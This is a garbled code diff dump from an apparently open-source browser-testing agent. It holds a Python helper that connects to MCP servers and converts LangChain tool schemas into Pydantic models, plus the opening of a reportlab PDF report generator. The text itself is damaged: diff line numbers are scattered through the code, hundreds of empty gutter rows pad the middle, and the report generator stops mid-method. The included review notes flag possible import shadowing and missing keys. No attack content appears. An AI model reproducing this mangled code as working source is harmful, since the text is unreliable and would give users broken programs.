import uuid
|
| 4 |
+
from datetime import date, datetime, time
|
| 5 |
+
from enum import Enum
|
| 6 |
+
from typing import Any, Dict, List, Optional, Set, Type, Union, get_type_hints
|
| 7 |
+
|
| 8 |
+
from browser_use.controller.registry.views import ActionModel
|
| 9 |
+
from langchain.tools import BaseTool
|
| 10 |
+
from langchain_mcp_adapters.client import MultiServerMCPClient
|
| 11 |
+
from pydantic import BaseModel, Field, create_model
|
| 12 |
+
from pydantic.v1 import BaseModel, Field
|
| 13 |
+
|
| 14 |
+
logger = logging.getLogger(__name__)
|
| 15 |
+
|
| 16 |
+
|
| 17 |
+
async def setup_mcp_client_and_tools(mcp_server_config: Dict[str, Any]) -> Optional[MultiServerMCPClient]:
    """
    Initialize a MultiServerMCPClient from the given server configuration.

    Accepts either the bare server mapping or a wrapper dict with a
    top-level "mcpServers" key (the standard MCP config-file layout).

    Args:
        mcp_server_config: MCP server configuration mapping.

    Returns:
        The initialized (entered) MultiServerMCPClient instance, or None if
        no configuration was provided or initialization failed.  The caller
        owns the client's lifecycle and must eventually call ``__aexit__``
        (or otherwise close it).

    Note:
        The previous docstring claimed a (tools, client) tuple was returned;
        the function actually returns only the client (or None).
    """
    logger.info("Initializing MultiServerMCPClient...")

    if not mcp_server_config:
        logger.error("No MCP server configuration provided.")
        return None

    try:
        # Unwrap the standard config-file layout: {"mcpServers": {...}}
        if "mcpServers" in mcp_server_config:
            mcp_server_config = mcp_server_config["mcpServers"]
        client = MultiServerMCPClient(mcp_server_config)
        # Enter the async context manually; the caller is responsible for
        # exiting it when the client is no longer needed.
        await client.__aenter__()
        return client

    except Exception as e:
        logger.error(f"Failed to setup MCP client or fetch tools: {e}", exc_info=True)
        return None
|
| 45 |
+
|
| 46 |
+
def create_tool_param_model(tool: BaseTool) -> Type[BaseModel]:
    """Creates a Pydantic model from a LangChain tool's schema.

    If the tool exposes an ``args_schema`` it is treated as a JSON-schema-like
    mapping and converted field by field; otherwise parameters are inferred
    from the signature of the tool's ``_run`` method.

    NOTE(review): this assumes ``tool.args_schema`` is a dict (as produced by
    the MCP adapter tools); standard LangChain tools may supply a BaseModel
    subclass instead, which would break the ``'properties' in json_schema``
    membership test -- confirm against the tools actually registered.

    NOTE(review): in this module ``Field``/``BaseModel`` resolve to
    ``pydantic.v1`` (the later import shadows the v2 one) while
    ``create_model`` is pydantic v2 -- verify the two interoperate for the
    constraint kwargs used below.

    Args:
        tool: The LangChain tool whose parameters should be modeled.

    Returns:
        A dynamically created Pydantic model class derived from ActionModel.
    """

    # Get tool schema information
    json_schema = tool.args_schema
    tool_name = tool.name

    # If the tool already has a schema defined, convert it to a new param_model
    if json_schema is not None:

        # Create new parameter model
        params = {}

        # Process properties if they exist
        if 'properties' in json_schema:
            # Find required fields
            required_fields: Set[str] = set(json_schema.get('required', []))

            for prop_name, prop_details in json_schema['properties'].items():
                # Resolve the JSON-schema type to a Python/Pydantic type;
                # the prefix keeps generated Enum/model names unique per tool.
                field_type = resolve_type(prop_details, f"{tool_name}_{prop_name}")

                # Check if parameter is required
                is_required = prop_name in required_fields

                # Get default value and description; required fields use
                # Ellipsis (...) so Pydantic enforces their presence.
                default_value = prop_details.get('default', ... if is_required else None)
                description = prop_details.get('description', '')

                # Add field constraints
                field_kwargs = {'default': default_value}
                if description:
                    field_kwargs['description'] = description

                # Add additional constraints if present (JSON-schema keyword
                # names mapped to the Pydantic Field equivalents).
                if 'minimum' in prop_details:
                    field_kwargs['ge'] = prop_details['minimum']
                if 'maximum' in prop_details:
                    field_kwargs['le'] = prop_details['maximum']
                if 'minLength' in prop_details:
                    field_kwargs['min_length'] = prop_details['minLength']
                if 'maxLength' in prop_details:
                    field_kwargs['max_length'] = prop_details['maxLength']
                if 'pattern' in prop_details:
                    field_kwargs['pattern'] = prop_details['pattern']

                # Add to parameters dictionary
                params[prop_name] = (field_type, Field(**field_kwargs))

        return create_model(
            f'{tool_name}_parameters',
            __base__=ActionModel,
            **params,  # type: ignore
        )

    # If no schema is defined, extract parameters from the _run method
    run_method = tool._run
    sig = inspect.signature(run_method)

    # Get type hints for better type information
    try:
        type_hints = get_type_hints(run_method)
    except Exception:
        # Forward references or missing modules can make this fail;
        # fall back to the raw signature annotations below.
        type_hints = {}

    params = {}
    for name, param in sig.parameters.items():
        # Skip 'self' parameter and any other parameters you want to exclude
        if name == 'self':
            continue

        # Get annotation from type hints if available, otherwise from signature
        annotation = type_hints.get(name, param.annotation)
        if annotation == inspect.Parameter.empty:
            annotation = Any

        # Use default value if available, otherwise make it required
        if param.default != param.empty:
            params[name] = (annotation, param.default)
        else:
            params[name] = (annotation, ...)

    return create_model(
        f'{tool_name}_parameters',
        __base__=ActionModel,
        **params,  # type: ignore
    )
| 133 |
+
|
| 134 |
+
def resolve_type(prop_details: Dict[str, Any], prefix: str = "") -> Any:
    """Recursively resolves a JSON schema property definition to a Python/Pydantic type.

    Handles ``$ref`` (unresolved, maps to Any), formatted strings, enums,
    arrays, nested objects, ``oneOf``/``anyOf`` unions, ``allOf``
    compositions, and multi-type lists such as ``["string", "null"]``
    (mapped to ``Optional[...]``).

    Args:
        prop_details: The JSON schema fragment describing a single property.
        prefix: Name prefix used when synthesizing Enum / nested model names
            so generated types are unique per tool/property.

    Returns:
        A Python type, typing construct, Enum subclass, or Pydantic model.
    """

    # Handle reference types
    if '$ref' in prop_details:
        # In a real application, reference resolution would be needed
        return Any

    # Basic type mapping
    type_mapping = {
        'string': str,
        'integer': int,
        'number': float,
        'boolean': bool,
        'array': List,
        'object': Dict,
        'null': type(None),
    }

    # Handle formatted strings; unknown formats fall back to plain str
    if prop_details.get('type') == 'string' and 'format' in prop_details:
        format_mapping = {
            'date-time': datetime,
            'date': date,
            'time': time,
            'email': str,
            'uri': str,
            'url': str,
            'uuid': uuid.UUID,
            'binary': bytes,
        }
        return format_mapping.get(prop_details['format'], str)

    # Handle enum types
    if 'enum' in prop_details:
        enum_values = prop_details['enum']
        # Create dynamic enum class with safe names
        enum_dict = {}
        for i, v in enumerate(enum_values):
            # Ensure enum names are valid Python identifiers
            if isinstance(v, str):
                key = v.upper().replace(' ', '_').replace('-', '_')
                if not key.isidentifier():
                    key = f"VALUE_{i}"
            else:
                key = f"VALUE_{i}"
            # Bug fix: distinct values can normalize to the same key
            # (e.g. "a b" and "a-b" both become "A_B"), which previously
            # overwrote the earlier member and silently dropped a value.
            # Disambiguate colliding keys with the value index.
            if key in enum_dict:
                key = f"{key}_{i}"
            enum_dict[key] = v

        # Only create enum if we have values
        if enum_dict:
            return Enum(f"{prefix}_Enum", enum_dict)
        return str  # Fallback for an empty enum list

    # Handle array types
    if prop_details.get('type') == 'array' and 'items' in prop_details:
        item_type = resolve_type(prop_details['items'], f"{prefix}_item")
        return List[item_type]  # type: ignore

    # Handle object types with properties
    if prop_details.get('type') == 'object' and 'properties' in prop_details:
        nested_params = {}
        for nested_name, nested_details in prop_details['properties'].items():
            nested_type = resolve_type(nested_details, f"{prefix}_{nested_name}")
            # Get required field info
            required_fields = prop_details.get('required', [])
            is_required = nested_name in required_fields
            default_value = nested_details.get('default', ... if is_required else None)
            description = nested_details.get('description', '')

            field_kwargs = {'default': default_value}
            if description:
                field_kwargs['description'] = description

            nested_params[nested_name] = (nested_type, Field(**field_kwargs))

        # Create nested model
        nested_model = create_model(f"{prefix}_Model", **nested_params)
        return nested_model

    # Handle union types (oneOf, anyOf)
    if 'oneOf' in prop_details or 'anyOf' in prop_details:
        union_schema = prop_details.get('oneOf') or prop_details.get('anyOf')
        union_types = []
        for i, t in enumerate(union_schema):
            union_types.append(resolve_type(t, f"{prefix}_{i}"))

        if union_types:
            return Union.__getitem__(tuple(union_types))  # type: ignore
        return Any

    # Handle allOf (intersection types): merge all declared properties into
    # a single composite model.
    if 'allOf' in prop_details:
        nested_params = {}
        for i, schema_part in enumerate(prop_details['allOf']):
            if 'properties' in schema_part:
                for nested_name, nested_details in schema_part['properties'].items():
                    nested_type = resolve_type(nested_details, f"{prefix}_allOf_{i}_{nested_name}")
                    # Check if required
                    required_fields = schema_part.get('required', [])
                    is_required = nested_name in required_fields
                    nested_params[nested_name] = (nested_type, ... if is_required else None)

        # Create composite model
        if nested_params:
            composite_model = create_model(f"{prefix}_CompositeModel", **nested_params)
            return composite_model
        return Dict

    # Default to basic types
    schema_type = prop_details.get('type', 'string')
    if isinstance(schema_type, list):
        # Handle multiple types (e.g., ["string", "null"])
        non_null_types = [t for t in schema_type if t != 'null']
        if non_null_types:
            primary_type = type_mapping.get(non_null_types[0], Any)
            if 'null' in schema_type:
                return Optional[primary_type]  # type: ignore
            return primary_type
        return Any

    return type_mapping.get(schema_type, Any)
|
src/utils/pdf_report_generator.py
ADDED
|
@@ -0,0 +1,736 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - PDF Report Generator
|
| 3 |
+
===============================================================
|
| 4 |
+
|
| 5 |
+
Generates comprehensive PDF testing reports with screenshots, results, and analysis.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import os
|
| 13 |
+
import json
|
| 14 |
+
import base64
|
| 15 |
+
from datetime import datetime
|
| 16 |
+
from pathlib import Path
|
| 17 |
+
from typing import List, Dict, Any, Optional
|
| 18 |
+
from reportlab.lib import colors
|
| 19 |
+
from reportlab.lib.pagesizes import letter, A4
|
| 20 |
+
from reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle
|
| 21 |
+
from reportlab.lib.units import inch
|
| 22 |
+
from reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer, Table, TableStyle, Image, PageBreak
|
| 23 |
+
from reportlab.platypus.frames import Frame
|
| 24 |
+
from reportlab.platypus.doctemplate import PageTemplate, BaseDocTemplate
|
| 25 |
+
from reportlab.lib.enums import TA_CENTER, TA_LEFT, TA_RIGHT, TA_JUSTIFY
|
| 26 |
+
from reportlab.pdfgen import canvas
|
| 27 |
+
from reportlab.lib.utils import ImageReader
|
| 28 |
+
import io
|
| 29 |
+
|
| 30 |
+
|
| 31 |
+
class PDFReportGenerator:
|
| 32 |
+
"""Generates comprehensive PDF testing reports for the Fagun Browser Automation Testing Agent."""
|
| 33 |
+
|
| 34 |
+
def __init__(self, output_dir: str = "reports"):
|
| 35 |
+
self.output_dir = Path(output_dir)
|
| 36 |
+
self.output_dir.mkdir(exist_ok=True)
|
| 37 |
+
self.styles = getSampleStyleSheet()
|
| 38 |
+
self._setup_custom_styles()
|
| 39 |
+
|
| 40 |
+
    def _setup_custom_styles(self):
        """Register the report's custom paragraph styles on the stylesheet.

        Adds title/heading styles in the report's brand colors plus three
        boxed status styles (success / failed / error) used to render test
        outcomes.  Called once from __init__.
        """
        # Title style
        self.styles.add(ParagraphStyle(
            name='CustomTitle',
            parent=self.styles['Title'],
            fontSize=24,
            spaceAfter=30,
            alignment=TA_CENTER,
            textColor=colors.HexColor('#2E86AB')  # brand blue
        ))

        # Heading styles
        self.styles.add(ParagraphStyle(
            name='CustomHeading1',
            parent=self.styles['Heading1'],
            fontSize=16,
            spaceAfter=12,
            spaceBefore=12,
            textColor=colors.HexColor('#2E86AB')
        ))

        self.styles.add(ParagraphStyle(
            name='CustomHeading2',
            parent=self.styles['Heading2'],
            fontSize=14,
            spaceAfter=8,
            spaceBefore=8,
            textColor=colors.HexColor('#A23B72')  # accent magenta
        ))

        # Status styles (boxed paragraphs: text color + background + border)
        self.styles.add(ParagraphStyle(
            name='SuccessStatus',
            parent=self.styles['Normal'],
            fontSize=12,
            textColor=colors.HexColor('#28A745'),
            backColor=colors.HexColor('#D4EDDA'),
            borderColor=colors.HexColor('#C3E6CB'),
            borderWidth=1,
            borderPadding=5
        ))

        self.styles.add(ParagraphStyle(
            name='FailedStatus',
            parent=self.styles['Normal'],
            fontSize=12,
            textColor=colors.HexColor('#DC3545'),
            backColor=colors.HexColor('#F8D7DA'),
            borderColor=colors.HexColor('#F5C6CB'),
            borderWidth=1,
            borderPadding=5
        ))

        # NOTE(review): despite the name, 'ErrorStatus' uses the
        # warning-yellow palette rather than a distinct error color --
        # confirm this is intentional.
        self.styles.add(ParagraphStyle(
            name='ErrorStatus',
            parent=self.styles['Normal'],
            fontSize=12,
            textColor=colors.HexColor('#FFC107'),
            backColor=colors.HexColor('#FFF3CD'),
            borderColor=colors.HexColor('#FFEAA7'),
            borderWidth=1,
            borderPadding=5
        ))
|
| 105 |
+
def generate_report(self, test_data: Dict[str, Any], output_filename: Optional[str] = None) -> str:
|
| 106 |
+
"""
|
| 107 |
+
Generate a comprehensive PDF testing report.
|
| 108 |
+
|
| 109 |
+
Args:
|
| 110 |
+
test_data: Dictionary containing test execution data
|
| 111 |
+
output_filename: Optional custom filename for the report
|
| 112 |
+
|
| 113 |
+
Returns:
|
| 114 |
+
Path to the generated PDF file
|
| 115 |
+
"""
|
| 116 |
+
if not output_filename:
|
| 117 |
+
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
|
| 118 |
+
output_filename = f"fagun_test_report_{timestamp}.pdf"
|
| 119 |
+
|
| 120 |
+
output_path = self.output_dir / output_filename
|
| 121 |
+
|
| 122 |
+
# Create PDF document
|
| 123 |
+
doc = SimpleDocTemplate(
|
| 124 |
+
str(output_path),
|
| 125 |
+
pagesize=A4,
|
| 126 |
+
rightMargin=72,
|
| 127 |
+
leftMargin=72,
|
| 128 |
+
topMargin=72,
|
| 129 |
+
bottomMargin=18
|
| 130 |
+
)
|
| 131 |
+
|
| 132 |
+
# Build report content
|
| 133 |
+
story = []
|
| 134 |
+
|
| 135 |
+
# Add title page
|
| 136 |
+
story.extend(self._create_title_page(test_data))
|
| 137 |
+
story.append(PageBreak())
|
| 138 |
+
|
| 139 |
+
# Add executive summary
|
| 140 |
+
story.extend(self._create_executive_summary(test_data))
|
| 141 |
+
story.append(PageBreak())
|
| 142 |
+
|
| 143 |
+
# Add test results overview
|
| 144 |
+
story.extend(self._create_test_results_overview(test_data))
|
| 145 |
+
story.append(PageBreak())
|
| 146 |
+
|
| 147 |
+
# Add detailed test results
|
| 148 |
+
story.extend(self._create_detailed_test_results(test_data))
|
| 149 |
+
story.append(PageBreak())
|
| 150 |
+
|
| 151 |
+
# Add screenshots section
|
| 152 |
+
story.extend(self._create_screenshots_section(test_data))
|
| 153 |
+
story.append(PageBreak())
|
| 154 |
+
|
| 155 |
+
# Add bugs and issues section
|
| 156 |
+
story.extend(self._create_bugs_section(test_data))
|
| 157 |
+
story.append(PageBreak())
|
| 158 |
+
|
| 159 |
+
# Add error monitoring section
|
| 160 |
+
story.extend(self._create_error_monitoring_section(test_data))
|
| 161 |
+
story.append(PageBreak())
|
| 162 |
+
|
| 163 |
+
# Add recommendations
|
| 164 |
+
story.extend(self._create_recommendations_section(test_data))
|
| 165 |
+
story.append(PageBreak())
|
| 166 |
+
|
| 167 |
+
# Add technical details
|
| 168 |
+
story.extend(self._create_technical_details(test_data))
|
| 169 |
+
|
| 170 |
+
# Build PDF
|
| 171 |
+
doc.build(story)
|
| 172 |
+
|
| 173 |
+
return str(output_path)
|
| 174 |
+
|
| 175 |
+
    def _create_title_page(self, test_data: Dict[str, Any]) -> List:
        """Create the title page of the report.

        Renders the product banner, a metadata summary table (run counts,
        duration, success rate) and the report author block.

        Args:
            test_data: Aggregated test-run data; missing keys fall back to
                'N/A' / 0 defaults.

        Returns:
            A list of reportlab flowables for the title page.
        """
        story = []

        # Main title
        story.append(Paragraph("🤖 Fagun Browser Automation Testing Agent", self.styles['CustomTitle']))
        story.append(Spacer(1, 20))

        # Report title
        story.append(Paragraph("Comprehensive Testing Report", self.styles['CustomHeading1']))
        story.append(Spacer(1, 30))

        # Report metadata (label / value rows)
        metadata = [
            ["Report Generated:", datetime.now().strftime("%Y-%m-%d %H:%M:%S")],
            ["Test Duration:", test_data.get('duration', 'N/A')],
            ["Total Tests:", str(test_data.get('total_tests', 0))],
            ["Passed Tests:", str(test_data.get('passed_tests', 0))],
            ["Failed Tests:", str(test_data.get('failed_tests', 0))],
            ["Error Tests:", str(test_data.get('error_tests', 0))],
            ["Success Rate:", f"{test_data.get('success_rate', 0):.1f}%"]
        ]

        metadata_table = Table(metadata, colWidths=[2*inch, 3*inch])
        metadata_table.setStyle(TableStyle([
            # Label column: light-grey background, bold font
            ('BACKGROUND', (0, 0), (0, -1), colors.HexColor('#F8F9FA')),
            ('TEXTCOLOR', (0, 0), (-1, -1), colors.black),
            ('ALIGN', (0, 0), (-1, -1), 'LEFT'),
            ('FONTNAME', (0, 0), (0, -1), 'Helvetica-Bold'),
            ('FONTSIZE', (0, 0), (-1, -1), 12),
            ('BOTTOMPADDING', (0, 0), (-1, -1), 12),
            ('BACKGROUND', (1, 0), (1, -1), colors.white),
        ]))

        story.append(metadata_table)
        story.append(Spacer(1, 40))

        # Author information
        story.append(Paragraph("Report Generated By:", self.styles['CustomHeading2']))
        story.append(Paragraph("Mejbaur Bahar Fagun", self.styles['Normal']))
        story.append(Paragraph("Software Engineer in Test", self.styles['Normal']))
        story.append(Paragraph("LinkedIn: https://www.linkedin.com/in/mejbaur/", self.styles['Normal']))

        return story
|
| 220 |
+
    def _create_executive_summary(self, test_data: Dict[str, Any]) -> List:
        """Create the executive summary section.

        Produces a narrative paragraph built from the aggregate counters and
        a "Key Findings" bullet list.  If the caller supplies no
        ``key_findings``, a default set is synthesized from the counters.

        Args:
            test_data: Aggregated test-run data.

        Returns:
            A list of reportlab flowables for this section.
        """
        story = []

        story.append(Paragraph("Executive Summary", self.styles['CustomHeading1']))
        story.append(Spacer(1, 12))

        # Summary statistics
        total_tests = test_data.get('total_tests', 0)
        passed_tests = test_data.get('passed_tests', 0)
        failed_tests = test_data.get('failed_tests', 0)
        error_tests = test_data.get('error_tests', 0)
        success_rate = test_data.get('success_rate', 0)

        # Reportlab collapses internal whitespace, so the raw indentation of
        # this triple-quoted string is not visible in the rendered PDF.
        summary_text = f"""
        This comprehensive testing report presents the results of automated browser testing
        performed by the Fagun Browser Automation Testing Agent. The testing session included
        {total_tests} total test cases, with {passed_tests} tests passing successfully,
        {failed_tests} tests failing, and {error_tests} tests encountering errors.

        The overall success rate of {success_rate:.1f}% provides valuable insights into the
        application's stability and functionality. This report includes detailed analysis of
        each test case, screenshots of critical moments, identified bugs and issues, and
        recommendations for improvement.
        """

        story.append(Paragraph(summary_text, self.styles['Normal']))
        story.append(Spacer(1, 20))

        # Key findings
        story.append(Paragraph("Key Findings", self.styles['CustomHeading2']))

        findings = test_data.get('key_findings', [])
        if not findings:
            # Fall back to findings derived from the aggregate counters
            findings = [
                f"Successfully executed {total_tests} automated test cases",
                f"Achieved {success_rate:.1f}% overall success rate",
                f"Identified {len(test_data.get('bugs', []))} potential issues requiring attention",
                f"Captured {len(test_data.get('screenshots', []))} screenshots for analysis"
            ]

        for finding in findings:
            story.append(Paragraph(f"• {finding}", self.styles['Normal']))
            story.append(Spacer(1, 6))

        return story
|
| 267 |
+
    def _create_test_results_overview(self, test_data: Dict[str, Any]) -> List:
        """Create the test results overview section.

        Renders a status summary table (passed / failed / error / total) and
        a short performance-metrics paragraph.

        NOTE(review): the percentage cells read 'passed_percentage',
        'failed_percentage' and 'error_percentage' keys -- confirm upstream
        actually populates these (they silently default to 0 here).

        Args:
            test_data: Aggregated test-run data.

        Returns:
            A list of reportlab flowables for this section.
        """
        story = []

        story.append(Paragraph("Test Results Overview", self.styles['CustomHeading1']))
        story.append(Spacer(1, 12))

        # Results summary table
        results_data = [
            ["Status", "Count", "Percentage", "Description"],
            ["✅ Passed", str(test_data.get('passed_tests', 0)), f"{test_data.get('passed_percentage', 0):.1f}%", "Tests completed successfully"],
            ["❌ Failed", str(test_data.get('failed_tests', 0)), f"{test_data.get('failed_percentage', 0):.1f}%", "Tests failed due to functional issues"],
            ["⚠️ Error", str(test_data.get('error_tests', 0)), f"{test_data.get('error_percentage', 0):.1f}%", "Tests encountered technical errors"],
            ["📊 Total", str(test_data.get('total_tests', 0)), "100.0%", "All test cases executed"]
        ]

        results_table = Table(results_data, colWidths=[1.5*inch, 1*inch, 1*inch, 2.5*inch])
        results_table.setStyle(TableStyle([
            # Header row: brand-blue background with light text
            ('BACKGROUND', (0, 0), (-1, 0), colors.HexColor('#2E86AB')),
            ('TEXTCOLOR', (0, 0), (-1, 0), colors.whitesmoke),
            ('ALIGN', (0, 0), (-1, -1), 'CENTER'),
            ('FONTNAME', (0, 0), (-1, 0), 'Helvetica-Bold'),
            ('FONTSIZE', (0, 0), (-1, 0), 12),
            ('BOTTOMPADDING', (0, 0), (-1, 0), 12),
            ('BACKGROUND', (0, 1), (-1, -1), colors.beige),
            ('GRID', (0, 0), (-1, -1), 1, colors.black)
        ]))

        story.append(results_table)
        story.append(Spacer(1, 20))

        # Performance metrics
